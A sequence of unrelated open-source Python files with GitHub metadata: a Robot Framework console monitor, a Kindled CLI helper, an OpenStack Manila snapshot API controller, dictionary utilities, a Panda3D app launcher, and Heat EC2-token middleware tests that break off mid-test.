self._keyword_marker = KeywordMarker(markers, self._stdout, self._highlighter)
self._last_info = None
def info(self, name, doc, start_suite=False):
width, separator = self._get_info_width_and_separator(start_suite)
self._last_info = self._get_info(name, doc, width) + separator
self._write(self._last_info, newline=False)
self._keyword_marker.reset_count()
def _get_info_width_and_separator(self, start_suite):
if start_suite:
return self._width, '\n'
return self._width - self._status_length - 1, ' '
def _get_info(self, name, doc, width):
if utils.get_console_length(name) > width:
return utils.pad_console_length(name, width)
info = name if not doc else '%s :: %s' % (name, doc.splitlines()[0])
return utils.pad_console_length(info, width)
def suite_separator(self):
self._fill('=')
def test_separator(self):
self._fill('-')
def _fill(self, char):
self._write(char * self._width)
def status(self, status, clear=False):
if self._should_clear_markers(clear):
self._clear_status()
self._highlight('| ', status, ' |')
def _should_clear_markers(self, clear):
return clear and self._keyword_marker.marking_enabled
def _clear_status(self):
self._clear_info_line()
self._rewrite_info()
def _clear_info_line(self):
self._write('\r' + ' ' * self._width + '\r', newline=False)
self._keyword_marker.reset_count()
def _rewrite_info(self):
self._write(self._last_info, newline=False)
def message(self, message):
if message:
self._write(message.strip())
def keyword_marker(self, kw):
if self._keyword_marker.marker_count == self._status_length:
self._clear_status()
self._keyword_marker.reset_count()
self._keyword_marker.mark(kw)
def error(self, message, level, clear=False):
if self._should_clear_markers(clear):
self._clear_info_line()
self._highlight('[ ', level, ' ] ' + message, error=True)
if self._should_clear_markers(clear):
self._rewrite_info()
def output(self, name, path):
self._write('%-8s %s' % (name+':', path))
def _write(self, text, newline=True, error=False):
stream = self._stdout if not error else self._stderr
if newline:
text += '\n'
stream.write(utils.encode_output(text))
stream.flush()
def _highlight(self, before, status, after, newline=True, error=False):
stream = self._stdout if not error else self._stderr
self._write(before, newline=False, error=error)
self._highlighter.highlight_status(status, stream)
self._write(after, newline=newline, error=error)
class StatusHighlighter(object):
def __init__(self, colors, *streams):
self._highlighters = dict((stream, self._get_highlighter(stream, colors))
for stream in streams)
def _get_highlighter(self, stream, colors):
auto = Highlighter if utils.isatty(stream) else NoHighlighting
highlighter = {'AUTO': auto,
'ON': Highlighter,
'FORCE': Highlighter, # compatibility with 2.5.5 and earlier
'OFF': NoHighlighting,
'ANSI': AnsiHighlighter}.get(colors.upper(), auto)
return highlighter(stream)
def highlight_status(self, status, stream):
highlighter = self._start_status_highlighting(status, stream)
stream.write(status)
highlighter.reset()
def _start_status_highlighting(self, status, stream):
highlighter = self._highlighters[stream]
{'PASS': highlighter.green,
'FAIL': highlighter.red,
'ERROR': highlighter.red,
'WARN': highlighter.yellow}[status]()
return highlighter
def highlight(self, text, color, stream):
highlighter = self._highlighters[stream]
getattr(highlighter, color)()
stream.write(text)
stream.flush()
highlighter.reset()
class KeywordMarker(object):
def __init__(self, markers, stdout, highlighter):
self._stdout = stdout
self._highlighter = highlighter
self.marking_enabled = self._marking_enabled(markers, stdout)
self.marker_count = 0
def _marking_enabled(self, markers, stdout):
auto = utils.isatty(stdout)
return {'AUTO': auto,
'ON': True,
'OFF': False}.get(markers.upper(), auto)
def mark(self, kw):
if self.marking_enabled:
marker, color = ('.', 'green') if kw.passed else ('F', 'red')
self._highlighter.highlight(marker, color, self._stdout)
self.marker_count += 1
def reset_count(self):
self.marker_count = 0
| {
"content_hash": "0c41a8c6c86ba25ddfb3f9524e9057f3",
"timestamp": "",
"source": "github",
"line_count": 207,
"max_line_length": 86,
"avg_line_length": 34.32367149758454,
"alnum_prop": 0.6015482054890922,
"repo_name": "qitaos/robotframework-mabot",
"id": "174dfd255b6221d2b7c0cd77c647e9d944d7712a",
"size": "7711",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "lib/robot/output/monitor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "11560"
},
{
"name": "HTML",
"bytes": "84841"
},
{
"name": "JavaScript",
"bytes": "38214"
},
{
"name": "Python",
"bytes": "1288243"
},
{
"name": "Shell",
"bytes": "32"
}
],
"symlink_target": ""
} |
import optparse
import os  # needed for os.devnull in simple_shell()
import subprocess
from kindled.controllers import DefaultController
def bootstrap():
""" Command Line Bootstrap Function """
usage = "%prog or type %prog -h (--help) for help"
description = "Kindled"
version = "v0.1"
parser = optparse.OptionParser(usage=usage, description=description, version=version)
parser.add_option("-v",
action="count",
dest="verbosity",
default=3,
help="Verbosity. Add more -v to be more verbose (%s)")
parser.add_option("-z",
"--logfile",
dest="logfile",
default=None,
help="Log to file instead of console")
parser.add_option("-f",
"--force",
dest="force",
action="store_true",
default=False,
help="Force generation of content, ignoring cached content")
parser.add_option("-t",
"--test",
dest="test",
action="store_true",
default=False,
help="Perform test run (disables email sending)")
parser.add_option("-d",
"--debug",
dest="debug",
action="store_true",
default=False,
help="Run in debug mode (outputs Calibre messages)")
(options, args) = parser.parse_args()
controller = DefaultController(options=options, args=args)
controller.execute()
def simple_shell(args, stdout=False):
""" Simple Subprocess Shell Helper Function """
if stdout:
rc = subprocess.call(args, shell=False)
else:
rc = subprocess.call(args, shell=False, stdout=open(os.devnull, "w"), stderr=subprocess.STDOUT)
return rc
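# Illustrative usage sketch (not part of the original module); the command is hypothetical.
#   simple_shell(['echo', 'hello'], stdout=True)   # returns the subprocess exit code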
| {
"content_hash": "963d32bb0c8da8b0707cae312339a949",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 103,
"avg_line_length": 30.796875,
"alnum_prop": 0.49670218163368846,
"repo_name": "jinglemansweep/Kindled",
"id": "d37cc4db7ca9252a79080747932b3810bde1fabc",
"size": "1971",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kindled/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25116"
}
],
"symlink_target": ""
} |
"""The share snapshots api."""
from oslo_log import log
import six
import webob
from webob import exc
from manila.api import common
from manila.api.openstack import wsgi
from manila.api.views import share_snapshots as snapshot_views
from manila import exception
from manila.i18n import _, _LI
from manila import share
LOG = log.getLogger(__name__)
class ShareSnapshotsController(wsgi.Controller):
"""The Share Snapshots API controller for the OpenStack API."""
_view_builder_class = snapshot_views.ViewBuilder
def __init__(self):
super(ShareSnapshotsController, self).__init__()
self.share_api = share.API()
def show(self, req, id):
"""Return data about the given snapshot."""
context = req.environ['manila.context']
try:
snapshot = self.share_api.get_snapshot(context, id)
except exception.NotFound:
raise exc.HTTPNotFound()
return self._view_builder.detail(req, snapshot)
def delete(self, req, id):
"""Delete a snapshot."""
context = req.environ['manila.context']
LOG.info(_LI("Delete snapshot with id: %s"), id, context=context)
try:
snapshot = self.share_api.get_snapshot(context, id)
self.share_api.delete_snapshot(context, snapshot)
except exception.NotFound:
raise exc.HTTPNotFound()
return webob.Response(status_int=202)
def index(self, req):
"""Returns a summary list of snapshots."""
return self._get_snapshots(req, is_detail=False)
def detail(self, req):
"""Returns a detailed list of snapshots."""
return self._get_snapshots(req, is_detail=True)
def _get_snapshots(self, req, is_detail):
"""Returns a list of snapshots."""
context = req.environ['manila.context']
search_opts = {}
search_opts.update(req.GET)
# Remove keys that are not related to share attrs
search_opts.pop('limit', None)
search_opts.pop('offset', None)
sort_key = search_opts.pop('sort_key', 'created_at')
sort_dir = search_opts.pop('sort_dir', 'desc')
# NOTE(vponomaryov): Manila stores in DB key 'display_name', but
# allows to use both keys 'name' and 'display_name'. It is leftover
# from Cinder v1 and v2 APIs.
if 'name' in search_opts:
search_opts['display_name'] = search_opts.pop('name')
common.remove_invalid_options(context, search_opts,
self._get_snapshots_search_options())
snapshots = self.share_api.get_all_snapshots(
context,
search_opts=search_opts,
sort_key=sort_key,
sort_dir=sort_dir,
)
limited_list = common.limited(snapshots, req)
if is_detail:
snapshots = self._view_builder.detail_list(req, limited_list)
else:
snapshots = self._view_builder.summary_list(req, limited_list)
return snapshots
def _get_snapshots_search_options(self):
"""Return share search options allowed by non-admin."""
return ('display_name', 'name', 'status', 'share_id', 'size')
def update(self, req, id, body):
"""Update a snapshot."""
context = req.environ['manila.context']
if not body or 'snapshot' not in body:
raise exc.HTTPUnprocessableEntity()
snapshot_data = body['snapshot']
valid_update_keys = (
'display_name',
'display_description',
)
update_dict = dict([(key, snapshot_data[key])
for key in valid_update_keys
if key in snapshot_data])
try:
snapshot = self.share_api.get_snapshot(context, id)
except exception.NotFound:
raise exc.HTTPNotFound()
snapshot = self.share_api.snapshot_update(context, snapshot,
update_dict)
snapshot.update(update_dict)
return self._view_builder.detail(req, snapshot)
@wsgi.response(202)
def create(self, req, body):
"""Creates a new snapshot."""
context = req.environ['manila.context']
if not self.is_valid_body(body, 'snapshot'):
raise exc.HTTPUnprocessableEntity()
snapshot = body['snapshot']
share_id = snapshot['share_id']
share = self.share_api.get(context, share_id)
# Verify that share can be snapshotted
if not share['snapshot_support']:
msg = _("Snapshot cannot be created from share '%s', because "
"share back end does not support it.") % share_id
LOG.error(msg)
raise exc.HTTPUnprocessableEntity(msg)
LOG.info(_LI("Create snapshot from share %s"),
share_id, context=context)
# NOTE(rushiagr): v2 API allows name instead of display_name
if 'name' in snapshot:
snapshot['display_name'] = snapshot.get('name')
del snapshot['name']
# NOTE(rushiagr): v2 API allows description instead of
# display_description
if 'description' in snapshot:
snapshot['display_description'] = snapshot.get('description')
del snapshot['description']
new_snapshot = self.share_api.create_snapshot(
context,
share,
snapshot.get('display_name'),
snapshot.get('display_description'))
return self._view_builder.detail(
req, dict(six.iteritems(new_snapshot)))
def create_resource():
return wsgi.Resource(ShareSnapshotsController())
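# Illustrative sketch (not part of the original module): the request body accepted by
# ShareSnapshotsController.create(); the share id and names below are hypothetical.
#   {"snapshot": {"share_id": "<share-uuid>",
#                 "name": "my-snap",
#                 "description": "nightly snapshot"}}
# 'name' and 'description' are mapped to 'display_name' and 'display_description'
# before the snapshot is created.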
| {
"content_hash": "d199986592a0c2731363c1465eb1a083",
"timestamp": "",
"source": "github",
"line_count": 169,
"max_line_length": 75,
"avg_line_length": 33.798816568047336,
"alnum_prop": 0.5948879551820728,
"repo_name": "jcsp/manila",
"id": "c5b9acf98af7685c452447178b7f3bd363559815",
"size": "6334",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manila/api/v1/share_snapshots.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "953"
},
{
"name": "Python",
"bytes": "4993686"
},
{
"name": "Shell",
"bytes": "42913"
}
],
"symlink_target": ""
} |
import os
class Articles(object):
def __init__(self, corpus):
self.corpus = corpus
self.index = dict()
self.articles_count = 0
self.docs_count = 0
def __iter__(self):
corpus = self.corpus
for sub in os.listdir(corpus):
subdir = os.path.join(corpus, sub)
for fname in os.listdir(subdir):
article_id = fname[:-4]
paragraphs_count =0
for line in open(os.path.join(subdir, fname)):
paragraphs_count +=1
self.docs_count += 1
yield line
self.index[str(self.docs_count)] = str(article_id)+'_'+str(paragraphs_count)
self.articles_count += 1
def print_stats(self):
print 'number of articles: ', self.articles_count
print 'number of docs: ', self.docs_count
class Mapper():
def __init__(self, corpus):
self.corpus = corpus
self.articles = dict()
for sub in os.listdir(self.corpus):
subdir = os.path.join(self.corpus, sub)
for fname in os.listdir(subdir):
for i, line in enumerate(open(os.path.join(subdir, fname))):
if i == 0:
self.articles[fname[:-4]] = line
break
def get_title(self, article_id):
return self.articles[article_id]
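# Illustrative usage sketch (not part of the original module); the corpus path and
# layout (subdir/<article_id>.txt, one paragraph per line) are hypothetical.
#   articles = Articles('/path/to/corpus')
#   for paragraph in articles:      # iterating also fills articles.index
#       pass
#   articles.print_stats()
#   # articles.index maps a running doc number to '<article_id>_<paragraph_number>'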
| {
"content_hash": "eaa59083b3e13fb44de4538c530c564f",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 81,
"avg_line_length": 27.4390243902439,
"alnum_prop": 0.6524444444444445,
"repo_name": "natsheh/semantic_query",
"id": "affc657836f344a1e9dc6609f5dbe2e53b4dc934",
"size": "1480",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/load.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "13864"
}
],
"symlink_target": ""
} |
"""Logic related to handling dictionaries.
"""
__authors__ = [
'"Sverre Rabbelier" <[email protected]>',
'"Lennard de Rijk" <[email protected]>',
]
from google.appengine.ext import db
import datetime
DICT_TYPES = (db.StringProperty, db.IntegerProperty)
STR_TYPES = (datetime.datetime)
def filter(target, keys):
"""Filters a dictonary to only allow items with the given keys.
Args:
target: The dictionary that is to be filtered
keys: The list with keys to filter the dictionary on
Returns:
A dictionary that only contains the (key,value) from target that
have their key in keys.
"""
result = {}
for key, value in target.iteritems():
if key in keys:
result[key] = value
return result
def merge(target, updates, sub_merge=False, recursive=False):
"""Like the builtin 'update' method but does not overwrite existing values.
Args:
target: The dictionary that is to be updated, may be None
updates: A dictionary containing new values for the original dict
sub_merge: Merge a dict or list present in both target and update
recursive: Determines whether merge_subdicts is recursive
Returns:
a new dict, with any missing values from updates merged into target
"""
target = target.copy() if target else {}
for key, value in updates.iteritems():
if key not in target:
target[key] = value
elif sub_merge:
target_value = target[key]
# try to merge dicts
if isinstance(value, dict) and isinstance(target_value, dict):
# the merge becomes recursive by specifying it not only as value
# to sub_merge but also to recursive
target[key] = merge(target_value, value,
sub_merge=recursive, recursive=recursive)
# try to merge lists
if isinstance(value, list) and isinstance(target_value, list):
target[key] = target_value + value
return target
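# Illustrative sketch (not part of the original module), in the doctest style used
# by split() below:
#   >>> merge({'a': 1}, {'a': 2, 'b': 3})
#   {'a': 1, 'b': 3}
#   >>> merge({'a': {'x': 1}}, {'a': {'y': 2}}, sub_merge=True)
#   {'a': {'x': 1, 'y': 2}}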
def zip(keys, values):
"""Returns a dict containing keys with values.
If there are more items in keys than in values, None will be used.
If there are more items in values than in keys, they will be ignored.
Args:
keys: the keys for the dictionary
values: the values for the dictionary
"""
result = {}
size = len(keys)
for i in range(size):
if i < len(values):
value = values[i]
else:
value = None
key = keys[i]
result[key] = value
return result
def unzip(target, order):
"""Constructs a list from target in the order specified by order.
Args:
target: the dictionary to pull the values from
order: the order of the keys
"""
return (target[key] for key in order)
def rename(target, keys):
"""Returns a dict containing only the key/value pairs from keys.
The keys from target will be looked up in keys, and the corresponding
value from keys will be used instead. If a key is not found, it is skipped.
Args:
target: the dictionary to filter
keys: the fields to filter
"""
result = {}
for key, value in target.iteritems():
if key in keys:
new_key = keys[key]
result[new_key] = value
return result
def split(target):
"""Takes a dictionary and splits it into single-valued dicts.
If there are any values in target that are a list it is split up
into a new dictionary instead.
>>> split({})
[{}]
>>> split({'foo':'bar'})
[{'foo': 'bar'}]
>>> split({'foo':'bar', 'bar':'baz'})
[{'foo': 'bar', 'bar': 'baz'}]
>>> split({'foo':'bar', 'bar':['one', 'two']})
[{'foo': 'bar', 'bar': 'one'}, {'foo': 'bar', 'bar': 'two'}]
>>> split({'foo':'bar', 'bar':['one', 'two'], 'baz': ['three', 'four']})
[{'bar': 'one', 'foo': 'bar', 'baz': 'three'},
{'bar': 'two', 'foo': 'bar', 'baz': 'three'},
{'bar': 'one', 'foo': 'bar', 'baz': 'four'},
{'bar': 'two', 'foo': 'bar', 'baz': 'four'}]
"""
result = [{}]
for key, values in target.iteritems():
# Make the value a list if it's not
if not isinstance(values, list):
values = [values]
tmpresult = []
# Iterate over all we gathered so far
for current_filter in result:
for value in values:
# Create a new dict from the current filter
newdict = dict(current_filter)
# And create a new dict that also has the current key/value pair
newdict[key] = value
tmpresult.append(newdict)
# Update the result for the next iteration
result = tmpresult
return result
def groupby(target, group_key):
"""Groups a list of dictionaries by group_key.
"""
result = {}
for value in target:
key_value = value[group_key]
if not key_value in result:
result[key_value] = []
result[key_value].append(value)
return result
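# Illustrative sketch (not part of the original module), hypothetical input:
#   >>> groupby([{'k': 'a', 'v': 1}, {'k': 'a', 'v': 2}, {'k': 'b', 'v': 3}], 'k')
#   {'a': [{'k': 'a', 'v': 1}, {'k': 'a', 'v': 2}], 'b': [{'k': 'b', 'v': 3}]}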
def groupDictBy(target, key, new_key=None):
"""Groups a dictionary by a key.
"""
if not new_key:
new_key = key
result = ((k, v[new_key]) for k, v in target.iteritems() if v[key])
return dict(result)
def identity(target):
"""Returns a dictionary with the values equal to the keys.
"""
result = ((i, i) for i in target)
return dict(result)
def format(target, input):
"""Returns a dictionary with the values formatted with input.
"""
result = ((k, v % input) for k, v in target.iteritems())
return dict(result)
def containsAll(target, keys):
"""Returns true iff target contains all keys.
"""
result = ((i in target) for i in keys)
return all(result)
def toDict(entity, field_names=None):
"""Returns a dict with all specified values of this entity.
Args:
entity: entity to be put in a dictionary
field_names: the fields that should be included, defaults to
all fields that are of a type that is in DICT_TYPES.
"""
result = {}
if not field_names:
props = entity.properties().iteritems()
field_names = [k for k, v in props if isinstance(v, DICT_TYPES)]
for key in field_names:
# Skip everything that is not valid
if not hasattr(entity, key):
continue
value = getattr(entity, key)
if callable(value):
value = value()
if isinstance(value, STR_TYPES):
value = str(value)
result[key] = value
return result
def cleanDict(target, filter_fields, escape_safe=False):
"""Returns a version of target with all specified fields html escaped
Args:
target: the dictionary that should be escaped
filter_fields: the fields that should be escaped
escape_safe: also escape fields marked as safe
"""
from django.utils.html import escape
from django.utils.safestring import SafeData
result = target.copy()
for field in filter_fields:
data = result[field]
if not data or (not escape_safe and isinstance(data, SafeData)):
continue
result[field] = escape(data)
return result
| {
"content_hash": "a4ea01cd301466967a53ed27b1686a94",
"timestamp": "",
"source": "github",
"line_count": 283,
"max_line_length": 77,
"avg_line_length": 23.996466431095406,
"alnum_prop": 0.6457075541157414,
"repo_name": "MatthewWilkes/mw4068-packaging",
"id": "1fb369ed76c1c04704d58aee0d62c813580340cd",
"size": "7401",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/melange/src/soc/logic/dicts.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "68827"
},
{
"name": "HTML",
"bytes": "586705"
},
{
"name": "JavaScript",
"bytes": "441502"
},
{
"name": "Python",
"bytes": "2136551"
},
{
"name": "Shell",
"bytes": "5667"
}
],
"symlink_target": ""
} |
"""
This tool will invoke the AppRunner to execute a packaged p3d
application. It requires that the current Panda3D and Python
versions match the version expected by the application.
Normally, you do not need to use this tool; instead, use the provided
standalone panda3d executable to invoke any p3d application. Using
panda3d will guarantee that the correct versions of Panda3D and Python
are used to run the application. However, there may be occasions when
it is useful to use this tool to run the application with the current
build instead of with its advertised version requirements.
Usage:
runp3d.py app.p3d [args]
The command-line arguments following the application name are passed
into the application unchanged.
See pack3d.p3d for an application that generates these p3d files.
"""
import sys
import getopt
from AppRunner import AppRunner, ArgumentError
from direct.task.TaskManagerGlobal import taskMgr
from pandac.PandaModules import Filename
def parseSysArgs():
""" Handles sys.argv, if there are any local arguments, and
returns a new argv suitable for passing into the
application. """
# We prefix a "+" sign, following the GNU convention, to tell
# getopt not to parse options following the first non-option
# parameter.
opts, args = getopt.getopt(sys.argv[1:], '+h')
for option, value in opts:
if option == '-h':
print __doc__
sys.exit(1)
if not args or not args[0]:
raise ArgumentError, "No Panda app specified. Use:\nrunp3d.py app.p3d"
arg0 = args[0]
p3dFilename = Filename.fromOsSpecific(arg0)
if p3dFilename.exists():
p3dFilename.makeAbsolute()
arg0 = p3dFilename.toOsSpecific()
return [arg0] + args[1:]
def runPackedApp(pathname):
runner = AppRunner()
runner.gotWindow = True
try:
runner.setP3DFilename(pathname, tokens = [], argv = [],
instanceId = 0, interactiveConsole = False)
except ArgumentError, e:
print e.args[0]
sys.exit(1)
if __name__ == '__main__':
runner = AppRunner()
runner.gotWindow = True
try:
argv = parseSysArgs()
runner.setP3DFilename(argv[0], tokens = [], argv = argv,
instanceId = 0, interactiveConsole = False)
except ArgumentError, e:
print e.args[0]
sys.exit(1)
taskMgr.run()
| {
"content_hash": "387569986349172fce37438f06d684da",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 79,
"avg_line_length": 31.31168831168831,
"alnum_prop": 0.6789713811696392,
"repo_name": "ToonTownInfiniteRepo/ToontownInfinite",
"id": "a7807de332f34f90d989c00fa82731520eb7b1c3",
"size": "2435",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Panda3D-1.9.0/direct/p3d/runp3d.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1703277"
},
{
"name": "C#",
"bytes": "9892"
},
{
"name": "C++",
"bytes": "5468044"
},
{
"name": "Emacs Lisp",
"bytes": "210083"
},
{
"name": "F#",
"bytes": "4611"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Objective-C",
"bytes": "23212"
},
{
"name": "Puppet",
"bytes": "5245"
},
{
"name": "Python",
"bytes": "34010215"
},
{
"name": "Shell",
"bytes": "11192"
},
{
"name": "Tcl",
"bytes": "1981257"
}
],
"symlink_target": ""
} |
import json
from oslo_config import cfg
from oslo_utils import importutils
import requests
import six
from heat.api.aws import ec2token
from heat.api.aws import exception
from heat.common import wsgi
from heat.tests import common
class Ec2TokenTest(common.HeatTestCase):
'''
Tests the Ec2Token middleware
'''
def setUp(self):
super(Ec2TokenTest, self).setUp()
self.m.StubOutWithMock(requests, 'post')
def _dummy_GET_request(self, params=None, environ=None):
# Mangle the params dict into a query string
params = params or {}
environ = environ or {}
qs = "&".join(["=".join([k, str(params[k])]) for k in params])
environ.update({'REQUEST_METHOD': 'GET', 'QUERY_STRING': qs})
req = wsgi.Request(environ)
return req
def test_conf_get_paste(self):
dummy_conf = {'auth_uri': 'http://192.0.2.9/v2.0'}
ec2 = ec2token.EC2Token(app=None, conf=dummy_conf)
self.assertEqual('http://192.0.2.9/v2.0', ec2._conf_get('auth_uri'))
self.assertEqual(
'http://192.0.2.9/v2.0/ec2tokens',
ec2._conf_get_keystone_ec2_uri('http://192.0.2.9/v2.0'))
def test_conf_get_opts(self):
cfg.CONF.set_default('auth_uri', 'http://192.0.2.9/v2.0/',
group='ec2authtoken')
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('http://192.0.2.9/v2.0/', ec2._conf_get('auth_uri'))
self.assertEqual(
'http://192.0.2.9/v2.0/ec2tokens',
ec2._conf_get_keystone_ec2_uri('http://192.0.2.9/v2.0/'))
def test_conf_get_ssl_default_options(self):
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertTrue(ec2.ssl_options['verify'],
"SSL verify should be True by default")
self.assertIsNone(ec2.ssl_options['cert'],
"SSL client cert should be None by default")
def test_conf_ssl_insecure_option(self):
ec2 = ec2token.EC2Token(app=None, conf={})
cfg.CONF.set_default('insecure', 'True', group='ec2authtoken')
cfg.CONF.set_default('ca_file', None, group='ec2authtoken')
self.assertFalse(ec2.ssl_options['verify'])
def test_conf_get_ssl_opts(self):
cfg.CONF.set_default('auth_uri', 'https://192.0.2.9/v2.0/',
group='ec2authtoken')
cfg.CONF.set_default('ca_file', '/home/user/cacert.pem',
group='ec2authtoken')
cfg.CONF.set_default('insecure', 'false', group='ec2authtoken')
cfg.CONF.set_default('cert_file', '/home/user/mycert',
group='ec2authtoken')
cfg.CONF.set_default('key_file', '/home/user/mykey',
group='ec2authtoken')
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('/home/user/cacert.pem', ec2.ssl_options['verify'])
self.assertEqual(('/home/user/mycert', '/home/user/mykey'),
ec2.ssl_options['cert'])
def test_get_signature_param_old(self):
params = {'Signature': 'foo'}
dummy_req = self._dummy_GET_request(params)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_signature(dummy_req))
def test_get_signature_param_new(self):
params = {'X-Amz-Signature': 'foo'}
dummy_req = self._dummy_GET_request(params)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_signature(dummy_req))
def test_get_signature_header_space(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('xyz', ec2._get_signature(dummy_req))
def test_get_signature_header_notlast(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar, '
'Signature=xyz,'
'SignedHeaders=content-type;host;x-amz-date ')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('xyz', ec2._get_signature(dummy_req))
def test_get_signature_header_nospace(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar,'
'SignedHeaders=content-type;host;x-amz-date,'
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('xyz', ec2._get_signature(dummy_req))
def test_get_access_param_old(self):
params = {'AWSAccessKeyId': 'foo'}
dummy_req = self._dummy_GET_request(params)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_access(dummy_req))
def test_get_access_param_new(self):
params = {'X-Amz-Credential': 'foo/bar'}
dummy_req = self._dummy_GET_request(params)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_access(dummy_req))
def test_get_access_header_space(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_access(dummy_req))
def test_get_access_header_nospace(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar,'
'SignedHeaders=content-type;host;x-amz-date,'
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_access(dummy_req))
def test_get_access_header_last(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo '
'SignedHeaders=content-type;host;x-amz-date,'
'Signature=xyz,Credential=foo/bar')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_access(dummy_req))
def test_call_x_auth_user(self):
req_env = {'HTTP_X_AUTH_USER': 'foo'}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app='xyz', conf={})
self.assertEqual('xyz', ec2.__call__(dummy_req))
def test_call_auth_nosig(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app='xyz', conf={})
self.assertRaises(exception.HeatIncompleteSignatureError,
ec2.__call__, dummy_req)
def test_call_auth_nouser(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo '
'SignedHeaders=content-type;host;x-amz-date,'
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app='xyz', conf={})
self.assertRaises(exception.HeatMissingAuthenticationTokenError,
ec2.__call__, dummy_req)
def test_call_auth_noaccess(self):
# If there's no accesskey in params or header, but there is a
# Signature, we expect HeatMissingAuthenticationTokenError
params = {'Signature': 'foo'}
dummy_req = self._dummy_GET_request(params)
ec2 = ec2token.EC2Token(app='xyz', conf={})
self.assertRaises(exception.HeatMissingAuthenticationTokenError,
ec2.__call__, dummy_req)
def test_call_x_auth_nouser_x_auth_user(self):
req_env = {'HTTP_X_AUTH_USER': 'foo',
'HTTP_AUTHORIZATION':
('Authorization: foo '
'SignedHeaders=content-type;host;x-amz-date,'
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app='xyz', conf={})
self.assertEqual('xyz', ec2.__call__(dummy_req))
def _stub_http_connection(self, headers=None, params=None, response=None,
req_url='http://123:5000/v2.0/ec2tokens',
verify=True, cert=None):
headers = headers or {}
params = params or {}
class DummyHTTPResponse(object):
text = response
def json(self):
return json.loads(self.text)
body_hash = ('e3b0c44298fc1c149afbf4c8996fb9'
'2427ae41e4649b934ca495991b7852b855')
req_creds = json.dumps({"ec2Credentials":
{"access": "foo",
"headers": headers,
"host": "heat:8000",
"verb": "GET",
"params": params,
"signature": "xyz",
"path": "/v1",
"body_hash": body_hash}})
req_headers = {'Content-Type': 'application/json'}
requests.post(req_url, data=req_creds, verify=verify, cert=cert,
headers=req_headers).AndReturn(DummyHTTPResponse())
def test_call_ok(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
auth_str = ('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1',
'HTTP_AUTHORIZATION': auth_str}
dummy_req = self._dummy_GET_request(environ=req_env)
ok_resp = json.dumps({'access': {'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
self._stub_http_connection(headers={'Authorization': auth_str},
response=ok_resp)
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.assertEqual('tenant', dummy_req.headers['X-Tenant-Name'])
self.assertEqual('abcd1234', dummy_req.headers['X-Tenant-Id'])
self.m.VerifyAll()
def test_call_ok_roles(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
auth_str = ('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')
